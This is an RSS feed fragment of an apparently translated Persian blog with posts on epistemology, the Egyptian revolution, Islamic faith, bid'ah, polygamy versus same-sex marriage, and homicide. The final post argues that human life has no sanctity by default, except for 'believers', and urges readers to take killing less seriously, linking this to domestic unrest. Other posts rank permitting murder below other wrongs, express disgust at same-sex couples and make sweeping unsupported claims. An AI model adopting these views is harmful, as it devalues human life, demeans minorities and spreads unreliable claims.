	<li>Istintaj (more precisely kasr): Deduction</li>
	<li>Istiqra: Induction</li>
	<li>Istintaj: Inference</li>
</ul>
Unfortunately, in Persian vocabulary all three of these words are translated as qiyas or istintaj. Kasr means arriving at a more particular judgement from a comprehensive, general one, going from cause to effect (literal translation); for example, if the sun shines, the air gets warm. Induction means going from the part to the whole. For example, if you throw a stone at a hundred birds and they flee, you conclude that if you throw a stone at the hundred-and-first it will flee too. (Mathematical induction differs from induction and is a kind of kasr.)

Inference, however, means moving sideways. For example, if a=b and b=c, we infer that a=c. We have not acquired this judgement; it already existed and we merely added it to the list of judgements. (Somewhat similar to kasr.) Interestingly, the human mind spends the greater part of its thinking and reasoning time on inference, so as to apparently learn new things from things it already knows.

<div id="attachment_575" class="wp-caption aligncenter" style="width: 293px"><a href="http://abiusx.com/blog/wp-content/uploads/2011/04/epistemology-1.jpg"><img class="size-medium wp-image-575" title="Epistemology" src="http://abiusx.com/blog/wp-content/uploads/2011/04/epistemology-1-283x300.jpg" alt="Epistemology" width="283" height="300" /></a><p class="wp-caption-text">Epistemology</p></div>

<strong>Positivism, induction and experiment</strong>

The school of Positivism, which has been and remains the foundation of the modern West, is built on induction. In this way of thinking, kasr does not exist as a method of acquiring knowledge and knowledge can be reached only through induction; this is why this school does not regard things like the soul or religion as knowledge at all (since it is unable to experience, test and induce them).

It is essential to note that induction in fact works as a simulation of kasr, performed weakly. For example, we reason that "since the apple fell from the tree onto Newton's head, the force of gravity exists on earth", whereas this reasoning is invalid, because even if the apple had not fallen on Newton's head gravity would still exist, so the cause of gravity's existence was not the apple's falling. In induction we are really trying to say "since gravity exists, the apple fell from the tree onto Newton's head", but since we cannot prove this judgement we use the earlier inverted, invalid version.

This is why induction does not give us definite and certain knowledge, and that is why Western epistemology has reached the point of claiming that no provable, correct knowledge exists, and that whatever cannot be falsified and tested is not knowledge either.

<strong>Kasr and its prerequisites</strong>

In order to use deductive (kasr) reasoning we must first "assume" correct principles from which we can deduce and so reach other conclusions and judgements. We call these correct principles logic and define it as "that which sound human beings share and accept as self-evident"; for example, that the conjunction of two contradictories is impossible. Logic is in fact a knowledge by presence that every human has within, without effort, and if we did not have it we would have no way of using kasr either.

Once logic and its principles are assumed (the impossibility of circularity, the impossibility of infinite regress, the impossibility of the conjunction of contradictories, and &#8230;), a huge mass of certain rational propositions is suddenly added to the domain of judgements, and by combining them and deducing from them one can have a huge mass of knowledge in hand.

<strong>Islam and knowledge</strong>

The Adliyyah (Shia) school, relying on logic and granting reason intrinsic validity (a human is born with reason), sets about proving the existence of God, His attributes, the resurrection, prophethood and &#8230;. All of these judgements are likewise proven deductively, and no use is made of induction, which is why this branch of knowledge is not doubtful and relative.

It should be noted that deductive knowledge, especially among Islamic scholars, advanced very far and reached very lofty peaks with which, for various reasons, we are not sufficiently familiar. This same deductive knowledge also brought about the golden age of the Islamic world, in which within a few hundred years we saw in the Islamic world the fastest growth of knowledge in all of human history (to which, as is clear to those acquainted with it, the present growth of knowledge cannot be compared). The reason can be taken to be Muslims' reliance on the definite parts of knowledge obtained by deduction, which allowed the edifice of knowledge to be built with ease. (Perhaps this is why Iran, with a growth in knowledge production averaging 11 times the world's, has been less active than the world average in the field of epistemology: for lack of need.)]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d9%85%d8%b9%d8%b1%d9%81%d8%aa-%d8%a7%d8%b3%d8%aa%d8%af%d9%84%d8%a7%d9%84/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>The Egyptian Revolution and the Right Way to Deal With It</title>
		<link>http://abiusx.com/%d8%a7%d9%86%d9%82%d9%84%d8%a7%d8%a8-%d9%85%d8%b5%d8%b1-%d9%88-%d8%a8%d8%b1%d8%ae%d9%88%d8%b1%d8%af-%d8%b5%d8%ad%db%8c%d8%ad-%d8%a8%d8%a7-%d8%a2%d9%86/</link>
		<comments>http://abiusx.com/%d8%a7%d9%86%d9%82%d9%84%d8%a7%d8%a8-%d9%85%d8%b5%d8%b1-%d9%88-%d8%a8%d8%b1%d8%ae%d9%88%d8%b1%d8%af-%d8%b5%d8%ad%db%8c%d8%ad-%d8%a8%d8%a7-%d8%a2%d9%86/#comments</comments>
		<pubDate>Sun, 30 Jan 2011 16:08:47 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Political]]></category>
		<category><![CDATA[America and Israel]]></category>
		<category><![CDATA[Egyptian revolution]]></category>
		<category><![CDATA[Hosni Mubarak]]></category>
		<category><![CDATA[Hijacking the revolution]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=563</guid>
		<description><![CDATA[I won't write at length; I am writing a piece on the nature of the Egyptian revolution, its likely effects and the right way to deal with it, which will be very useful for the dear ones who understand the importance of politics (God willing). Firstly, the Egyptian revolution will certainly not be for the good; if American democracy is established in Egypt it will certainly be worse than Mubarak's dictatorship [...]]]></description>
				<content:encoded><![CDATA[I won't write at length; I am writing a piece on the nature of the Egyptian revolution, its likely effects and the right way to deal with it, which will be very useful for the dear ones who understand the importance of politics (God willing).

Firstly, the Egyptian revolution will certainly not be for the good; if American democracy is established in Egypt it will certainly be worse than Mubarak's dictatorship, and the very religion and faith the people have will be blown away too (because in a dictatorship the ruler oppresses and the people are the oppressed, but the corruption is at the level of the rulers and not of the people, whereas in a democracy rulers and people become one, and if the rulers are corrupt the people will be corrupt too. More explanation in another post)

Secondly, as everyone knows, the Egyptian people's revolution has no cohesive leadership and has occurred through the domino effect of the revolutions in Tunisia and the surrounding region. This is very dangerous, and as long as no leadership is designated for the revolution, its precise line and policy are unknown too, and any current can manipulate and hijack it.

Thirdly, 90 percent of Egypt's population is Muslim, and in the images of the marches it was clear to all that the revolution is being carried out by devout Muslims; a segment that was not at least outwardly strongly Muslim was not to be seen in the crowd.

Given this, all the various currents have lunged to fish in troubled waters and hijack the Egyptian revolution to their own advantage: America by presenting ElBaradei as leader and falsely announcing that he is under pressure not to take up the leadership, Saudi Arabia by supporting the sitting government, Iran and Israel by silence, and every other current in its own way. But we must not hand all analysis over to powerful American institutions such as <a href="http://en.wikipedia.org/wiki/RAND">RAND</a>, for if we act that way the outcome will be theirs too.

Meanwhile the current known as the Green Movement intends to hold a gathering in Iran, oblivious to the fact that this line originates from America, so as not only to tie the Egyptian revolution to the Green Movement and present the two as identical in nature to the world, but also to divert public attention somewhat from the turmoil in Egypt.

Iran, however, given the sensitivity of the matter, has no possibility of making any official political statement, a reaction the opposing currents are eagerly awaiting so as to pin the unrest in Egypt on Iran and its intelligence agents and once again present us as terrorists and enemies of nations. On the other hand, if Iran takes no position at all, how can it turn the current to its own advantage?

The solution that occurred to me is that a broad popular demonstration, without government cover, be held in Iran in support of the Egyptian revolution. In this way not only will the nature of the Egyptian revolution change into that of the Islamic Revolution, but this revolution will be claimed for Iran, its people and its path, and if Egypt undergoes an Islamic revolution and joins Iran's front, Israel in the near future and America in the distant future will be removed from the scene.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%a7%d9%86%d9%82%d9%84%d8%a7%d8%a8-%d9%85%d8%b5%d8%b1-%d9%88-%d8%a8%d8%b1%d8%ae%d9%88%d8%b1%d8%af-%d8%b5%d8%ad%db%8c%d8%ad-%d8%a8%d8%a7-%d8%a2%d9%86/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>The Definition of Faith in Religions</title>
		<link>http://abiusx.com/%d8%aa%d8%b9%d8%b1%db%8c%d9%81-%d8%a7%db%8c%d9%85%d8%a7%d9%86-%d8%af%d8%b1-%d8%a7%d8%af%db%8c%d8%a7%d9%86/</link>
		<comments>http://abiusx.com/%d8%aa%d8%b9%d8%b1%db%8c%d9%81-%d8%a7%db%8c%d9%85%d8%a7%d9%86-%d8%af%d8%b1-%d8%a7%d8%af%db%8c%d8%a7%d9%86/#comments</comments>
		<pubDate>Sat, 29 Jan 2011 19:25:04 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Critical]]></category>
		<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[Religious]]></category>
		<category><![CDATA[faith]]></category>
		<category><![CDATA[spiritual]]></category>
		<category><![CDATA[Belief]]></category>
		<category><![CDATA[Iman (faith)]]></category>
		<category><![CDATA[Definition of faith]]></category>
		<category><![CDATA[Reason]]></category>
		<category><![CDATA[Creed]]></category>
		<category><![CDATA[Knowledge]]></category>
		<category><![CDATA[There is no compulsion in religion]]></category>
		<category><![CDATA[Ma'rifat (knowledge)]]></category>
		<category><![CDATA[Believer]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=556</guid>
		<description><![CDATA[I am at your service with a very short post on the definition of faith in religions. Faith in Western and modern secular religions (Christianity, Judaism and &#8230;) has the following definition: strong belief in God or in the doctrines of a religion, based on spiritual apprehension rather than proof. That is, strong belief in God or in the creed [...]]]></description>
				<content:encoded><![CDATA[I am at your service with a very short post on the definition of faith in religions.

Faith in Western and modern secular religions (Christianity, Judaism and &#8230;) has the following definition:
<p style="text-align: center;">strong belief in God or in the doctrines of a religion, based on spiritual apprehension rather than proof.</p>
<p style="text-align: center;">that is</p>
<p style="text-align: center;">strong belief in God or in the creed of a religion, based on spiritual understanding rather than argument and proof</p>
<p style="text-align: center;">(according to the New Oxford American Dictionary)</p>
<p style="text-align: right;">And in Islam, what does faith (iman) mean? Many philosophical discussions have taken place on this, the essence of which is as follows:</p>
(لا إِکْراهَ فِی الدِّینِ قَدْ  تَبَیَّنَ الرُّشْدُ مِنَ الْغَیِّ فَمَنْ یَکْفُرْ  بِالطَّاغُوتِ وَ یُؤْمِنْ بِاللَّهِ فَقَدِ اسْتَمْسَکَ بِالْعُرْوَةِ  الْوُثْقی&#8230;); "There is no compulsion in religion. The path of guidance and of error has been made clear to all; so whoever turns back from disbelief and rebellion and inclines to the path of faith and the worship of God has grasped a firm and steady cord." (Ayat al-Kursi)
Faith is belief becoming established in the human heart, and is derived from the root amn (security). It is as though the believer, through faith, becomes secure from the doubt and uncertainty that are the blight of belief. (Allameh Tabatabai)

Faith is of the kind of belief and knowledge, but it is not mere knowledge; it must enter the human heart and bind itself there to become a creed ('aqidah). Thus knowledge and learning (and reason) are a necessary condition of faith, but not a sufficient one.

Bear in mind that in discussions arising from Western ideologies, you should take the word iman as the equivalent of Faith, and not of Islamic iman.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%aa%d8%b9%d8%b1%db%8c%d9%81-%d8%a7%db%8c%d9%85%d8%a7%d9%86-%d8%af%d8%b1-%d8%a7%d8%af%db%8c%d8%a7%d9%86/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Bid'ah, Bid'ah!</title>
		<link>http://abiusx.com/%d8%a8%d8%af%d8%b9%d8%aa%d8%8c-%d8%a8%d8%af%d8%b9%d8%aa/</link>
		<comments>http://abiusx.com/%d8%a8%d8%af%d8%b9%d8%aa%d8%8c-%d8%a8%d8%af%d8%b9%d8%aa/#comments</comments>
		<pubDate>Wed, 12 Jan 2011 22:32:53 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Loss of religion]]></category>
		<category><![CDATA[Adding to religion]]></category>
		<category><![CDATA[The worst bid'ah]]></category>
		<category><![CDATA[Bid'ah (innovation)]]></category>
		<category><![CDATA[Distortion]]></category>
		<category><![CDATA[Distortion of religion]]></category>
		<category><![CDATA[Piety (taqwa)]]></category>
		<category><![CDATA[Removing from religion]]></category>
		<category><![CDATA[Forbidding what God has permitted]]></category>
		<category><![CDATA[Non-essential halal]]></category>
		<category><![CDATA[Essential halal]]></category>
		<category><![CDATA[Permitting what God has forbidden]]></category>
		<category><![CDATA[Essential halals]]></category>
		<category><![CDATA[Philosophy]]></category>
		<category><![CDATA[Scrupulousness (wara')]]></category>
		<category><![CDATA[Theology (kalam)]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=552</guid>
		<description><![CDATA[Bid'ah means distorting religion, and more precisely adding to it something that is not in it and removing from it something that is. In this post I restrict bid'ah to two classes: permitting what God has forbidden and forbidding what God has permitted. But the question we intend to examine is this: Forbidding [...]]]></description>
				<content:encoded><![CDATA[Bid'ah means distorting religion, and more precisely adding to it something that is not in it and removing from it something that is. In this post I restrict bid'ah to two classes: permitting what God has forbidden and forbidding what God has permitted. But the question we intend to examine is this:
<p style="text-align: center;"><strong>Is it worse to forbid what God has permitted, or to permit what God has forbidden?</strong></p>
<p style="text-align: right;">At first glance we might say that permitting what God has forbidden is far worse, because it spreads a sin that ruins souls, whereas forbidding what God has permitted may not be so bad, since it is like caution: if we do not use something that is permitted, at least we have not sinned and have merely endured some needless hardship. But this view has weak points.</p>
<p style="text-align: right;">To get a precise answer to this question we must answer a fundamental question to which Islamic theologians have given different answers from the beginning until now, namely: "Is everything permitted except what has been declared forbidden, or the reverse?" My belief is that the first case holds, and on that basis I will answer the original question.</p>
<p style="text-align: right;">Things that are permitted fall into two classes:</p>

<ul>
	<li>Essential</li>
	<li>Non-essential</li>
</ul>
Essential halals are things such as eating (with some restrictions, but in general), marrying, recreation and so on, which are necessary for a human life; if these were forbidden, one could not live. Non-essential halals are all the halals that do not fall into that class. In this post, and in general, we will not offer a precise way of distinguishing these two classes and leave that work to the philosophers, theologians and jurists.

In my view, forbidding essential halals is the worst kind of bid'ah and is more harmful even than permitting very bad harams such as adultery or murder, because these halals are necessary for the life of a believing person, and if they are not possible (and are prohibited), the religion as a whole is no longer possible and becomes a defective package; religiosity as a whole will not be possible, and so the whole religion will be lost. Whereas even if murder is permitted, in the end some harm comes to society and it will be controllable to some extent (and the other sins are mostly spiritually harmful), and reason and human society can also bring it somewhat closer to equilibrium.

Unfortunately most of us, without reason and by mistaken supposition, think that forbidding halals is a kind of extra piety and scrupulousness, and that its only harm is that we will be over-cautious, whereas it is the worst kind of bid'ah and will cause the loss of God's religion. It certainly will not be so easily forgiven either.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%a8%d8%af%d8%b9%d8%aa%d8%8c-%d8%a8%d8%af%d8%b9%d8%aa/feed/</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>Polygamy from the Perspective of Liberal Human Rights</title>
		<link>http://abiusx.com/%da%86%d9%86%d8%af-%d9%87%d9%85%d8%b3%d8%b1%db%8c-%d8%a7%d8%b2-%d9%85%d9%86%d8%b8%d8%b1-%d8%ad%d9%82%d9%88%d9%82-%d8%a8%d8%b4%d8%b1-%d9%84%db%8c%d8%a8%d8%b1%d8%a7%d9%84/</link>
		<comments>http://abiusx.com/%da%86%d9%86%d8%af-%d9%87%d9%85%d8%b3%d8%b1%db%8c-%d8%a7%d8%b2-%d9%85%d9%86%d8%b8%d8%b1-%d8%ad%d9%82%d9%88%d9%82-%d8%a8%d8%b4%d8%b1-%d9%84%db%8c%d8%a8%d8%b1%d8%a7%d9%84/#comments</comments>
		<pubDate>Tue, 04 Jan 2011 23:48:08 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Hypergamy]]></category>
		<category><![CDATA[Mormon]]></category>
		<category><![CDATA[Polyandry]]></category>
		<category><![CDATA[Polygamy]]></category>
		<category><![CDATA[Polygyny]]></category>
		<category><![CDATA[same-sex-marriage]]></category>
		<category><![CDATA[Marriage]]></category>
		<category><![CDATA[Marriage of two women]]></category>
		<category><![CDATA[Marriage of two men]]></category>
		<category><![CDATA[Same-sex marriage]]></category>
		<category><![CDATA[Human rights]]></category>
		<category><![CDATA[Liberalism]]></category>
		<category><![CDATA[Liberalism (alternate spelling)]]></category>
		<category><![CDATA[Polygyny (Persian tag)]]></category>
		<category><![CDATA[Polyandry (Persian tag)]]></category>
		<category><![CDATA[Polygamy (Persian tag)]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=513</guid>
		<description><![CDATA[For a while this post had been picking a real fight in my head: hey, why aren't you writing me? I've been wronged! And I would say, plenty before you have been wronged too! But yesterday, when I watched the film The 8th Mormon Proposition, this post's priority went up. In this post, regarding Mormonism and the American Constitution and [...]]]></description>
				<content:encoded><![CDATA[For a while this post had been picking a real fight in my head: hey, why aren't you writing me? I've been wronged! And I would say, plenty before you have been wronged too! But yesterday, when I watched the film The 8th Mormon Proposition, this post's priority went up. In this post I will not talk about Mormonism, the American Constitution and the 8th Proposition, although they are vital discussions that we must certainly research. I will try to write the post so that it does not depend on them.

Today's subject is a comparative, critical, rational examination; it does not affirm or reject any statement on the basis of a theological rational proposition, but only challenges the existing system and shows its foundations to be baseless. As you know, marriage between two people of the same sex is legal in many US states and in a notable percentage of the world's countries, to the extent that more than 50 percent of the US population votes in favour of such marriage and regards it as a natural human right.

Nor do we intend to deem it wrong or right, let it be whatever it is (although if you study documentaries about the lives of two people of the same sex, whether two men or two women, it is impossible not to feel sick), and we also do not intend to examine the reasons for the goodness or badness of this act from the standpoint of reason and custom, since that has been laid out in almost everything written on the subject and is evident to the esteemed readers as well.

Polygamy, which divides into polygyny and polyandry (although from here on by this term we mean polygyny, as polyandry has not been observed, and is not observed, apart from a few cases in all of history), is likewise, in most societies and countries of the world, either prohibited and legally punished, or disapproved and not regarded as proper, or prohibited but not legally prosecuted.

<div id="attachment_544" class="wp-caption aligncenter" style="width: 310px"><a href="http://abiusx.com/blog/wp-content/uploads/2011/01/no-to-polygamy.jpg"><img class="size-medium wp-image-544" title="no-to-polygamy" src="http://abiusx.com/blog/wp-content/uploads/2011/01/no-to-polygamy-300x205.jpg" alt="Women in Indonesia who, under the influence of propaganda, demonstrate against polygamy" width="300" height="205" /></a><p class="wp-caption-text">Women in Indonesia who, under the influence of propaganda, demonstrate against polygamy</p></div>

Why is marriage between two people of the same sex permitted? Is it merely because the two of them, and even their society, have reached the agreement that they want to and can live together that this right has been created? Does the mere fact that this act has no clear apparent harm issue a licence for its freedom? Is the mere fact that love has arisen between two people of the same sex a licence for marriage? Very well, all of this granted. Then why is polygamy not permitted? If a man and a number of women reach an agreement, do they not have the right to marry? Can the marriage of one man to several women, which has existed since the earliest days of humankind and has never been at odds with human nature (its only enemy having been women's jealousy), in no way be licensed, while the marriage of two men or two women, which even now seems strange and inappropriate to many, becomes permitted merely by agreement and by granting human rights to human beings? And why, for that matter, is marriage between several people of the same sex not licensed??

Liberal human rights, despite declaring individual (and then social) freedoms of human beings as their foundation, very easily violate them through agitation and propaganda wherever that freedom collides with their ideology and their methods of dominating the world, such that today in American society more than half of the people favour same-sex marriage, yet far fewer than a third consider polygamy an option worth considering!

<div id="attachment_550" class="wp-caption aligncenter" style="width: 364px"><a href="http://abiusx.com/blog/wp-content/uploads/2011/01/joseph-smith-polygamy.jpg"><img class="size-medium wp-image-550" title="joseph-smith-polygamy" src="http://abiusx.com/blog/wp-content/uploads/2011/01/joseph-smith-polygamy-300x173.jpg" alt="A picture of Joseph Smith and his wives, the false prophet of the Mormon sect (Latter-day Saints Christianity)" width="354" height="204" /></a><p class="wp-caption-text">A picture of Joseph Smith and his wives, the false prophet of the Mormon sect (Latter-day Saints Christianity)</p></div>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%da%86%d9%86%d8%af-%d9%87%d9%85%d8%b3%d8%b1%db%8c-%d8%a7%d8%b2-%d9%85%d9%86%d8%b8%d8%b1-%d8%ad%d9%82%d9%88%d9%82-%d8%a8%d8%b4%d8%b1-%d9%84%db%8c%d8%a8%d8%b1%d8%a7%d9%84/feed/</wfw:commentRss>
		<slash:comments>61</slash:comments>
		</item>
		<item>
		<title>And Thou Shalt Not Kill&#8230;</title>
		<link>http://abiusx.com/%d9%88-%d8%aa%d9%88-%d9%86%d8%a8%d8%a7%db%8c%d8%af-%d8%a8%da%a9%d8%b4%db%8c/</link>
		<comments>http://abiusx.com/%d9%88-%d8%aa%d9%88-%d9%86%d8%a8%d8%a7%db%8c%d8%af-%d8%a8%da%a9%d8%b4%db%8c/#comments</comments>
		<pubDate>Thu, 30 Dec 2010 07:55:22 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Critical]]></category>
		<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[Religious]]></category>
		<category><![CDATA[thou shalt not kill]]></category>
		<category><![CDATA[Homicide]]></category>
		<category><![CDATA[Haram]]></category>
		<category><![CDATA[Prohibition of killing]]></category>
		<category><![CDATA[Ten Commandments]]></category>
		<category><![CDATA[Corruption on earth]]></category>
		<category><![CDATA[Murder]]></category>
		<category><![CDATA[Killing in Islam]]></category>
		<category><![CDATA[Killing in the Quran]]></category>
		<category><![CDATA[Killing in Christianity]]></category>
		<category><![CDATA[Killing in Judaism]]></category>
		<category><![CDATA[Taking a life]]></category>
		<category><![CDATA[Qisas (retribution)]]></category>
		<category><![CDATA[Killing]]></category>
		<category><![CDATA[Major sin]]></category>
		<category><![CDATA[The fourth major sin]]></category>
		<category><![CDATA[Major sins]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=515</guid>
		<description><![CDATA[با یک مطلب کوتاه راجع به قتل نفس از دیدگاه عقل و دین سلسله مباحث را ادامه خواهیم داد. این مطلب را بسیار رک و بدون تفسیر می‌نویسم چون جای مغالطه زیاد خواهد داشت. از دید عقل، قتل در موارد بسیار زیادی لازم است، به عنوان مثال وقتی کسی قصد کشتن شما را می‌کند، و [...]]]></description>
				<content:encoded><![CDATA[We will continue this series of discussions with a short piece on homicide from the viewpoint of reason and religion. I write this piece very bluntly and without interpretation, because it leaves much room for fallacy.

From the viewpoint of reason, killing is necessary in a great many cases. For example, when someone intends to kill you, will not desist by any means, and you have no way to overcome or restrain him (say, he is firing a gun, or he is attacking you with a knife and you know no martial arts), then as a rule you must kill him. Likewise if someone is doing something whose harm far outweighs the value of his own life, for example planting and detonating an atomic bomb in a densely populated city. So the minimum that reason establishes is that killing is sometimes necessary and obligatory.

As for killing in the religions: in Judaism and Christianity, according to the Ten Commandments which, by the present-day belief of these religions, God gave to Moses (peace be upon him), the sixth commandment (the fifth in the Catholic and Lutheran numbering) reads "Thou shalt not kill" or "Thou shalt not murder", archaic wording for "you must not kill". Many devout Catholics believe that under no circumstances may one take a life, and, as with their other beliefs, they accept no rational argument for, against, or qualifying this position.

In Islam, unlike Judaism and Christianity, homicide has not been forbidden in this absolute way. The root q-t-l (to kill) occurs 173 times in the Quran; a considerable number of these occurrences condemn the conduct of various nations in killing the prophets or their own children, but some concern the ruling on homicide and the sanctity of life, the most important of which are:
<p style="text-align: center;"><em>For this reason We decreed upon the Children of Israel that whoever kills a person, other than in retaliation for a killing or for corruption on the earth, it is as if he had killed all mankind; and whoever gives life to one, it is as if he had given life to all mankind. And indeed Our messengers came to them with clear proofs, yet even after that many of them continued to transgress on the earth. (Al-Ma'idah, 32)</em></p>
<p style="text-align: center;"><em>Say: "Come, let me recite what your Lord has forbidden you: that you associate nothing with God; that you be good to your parents; that you do not kill your children out of (fear of) poverty, for We provide for you and for them; that you do not approach shameful deeds, whether open or hidden; and that you do not kill the soul that God has made sacred, except by right (and with just cause). This is what God has enjoined upon you, so that you may understand." (Al-An'am, 151)</em></p>
<p style="text-align: center;"><em>And do not kill the soul whose blood God has made sacred, except by right. And whoever is killed wrongfully, We have given his heir authority (and the right of qisas); but let him not exceed the limits in killing, for he is supported. (Al-Isra, 33)</em></p>
<p style="text-align: center;"><em>And those who do not call upon another god alongside God, and do not kill the soul whose blood God has made sacred except by right, and do not commit adultery; and whoever does this will meet a severe punishment. (Al-Furqan, 68)</em></p>
<p style="text-align: center;"><em>And whoever kills a believer deliberately, his recompense is Hell, in which he will abide forever; God's wrath is upon him, He has cast him far from His mercy, and He has prepared a tremendous punishment for him. (An-Nisa, 93)</em></p>
<p style="text-align: right;">In his commentary on the first verse, Allamah Sayyid Muhammad Husayn Tabatabai says that the phrase about killing all of humanity is an allegorical simile, made from the viewpoint that annulling the reality of creation is the same whether it is one person or several; it is not a jurisprudential ruling meant to convey the severity of the sin. This verse therefore has no bearing on the conclusion we will draw. The last verse likewise carries the qualifier "believer" and appears mainly to emphasize the matter of qisas.</p>
<p style="text-align: right;">In every other case, including those I could not locate in the Quran, the qualifier "do not kill the one whose blood God has made sacred" is always used. That is, by default the shedding of human blood is not sacrosanct, except in those cases where God has placed sanctity upon that blood (as in the last verse). In Shahid Dastgheib's list of major sins as well, homicide appears as the fourth major sin, in these words: "Manslaughter: killing a person whom God the Exalted has forbidden to be killed and whose blood He has deemed sacred, except where it is a matter of qisas or the execution of the divine punishments."</p>
<p style="text-align: right;">Therefore, from the viewpoint of Islam, the shedding of a human being's blood is not in itself so enormous an event that it shakes the world and shifts its axes. For it to be so, many conditions and qualifications must hold for that person; for example, he must be an instance of a "believer".</p>
<p style="text-align: right;">Unfortunately, a mistaken belief that has entered our people's minds from Christianity and Judaism, to some extent from Buddhism and Taoism, and on the other side from liberalism and humanism (because they treat human life as the ultimate end), purely through cultural invasion, has caused them to attach an unreal and exaggerated sanctity to the killing of human beings; we saw many people led astray by this mistaken belief in last year's sedition. It is hoped that by reading this piece, the judgement of dear readers will have been recalibrated at least in this one area.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d9%88-%d8%aa%d9%88-%d9%86%d8%a8%d8%a7%db%8c%d8%af-%d8%a8%da%a9%d8%b4%db%8c/feed/</wfw:commentRss>
		<slash:comments>54</slash:comments>
		</item>
	</channel>
</rss>
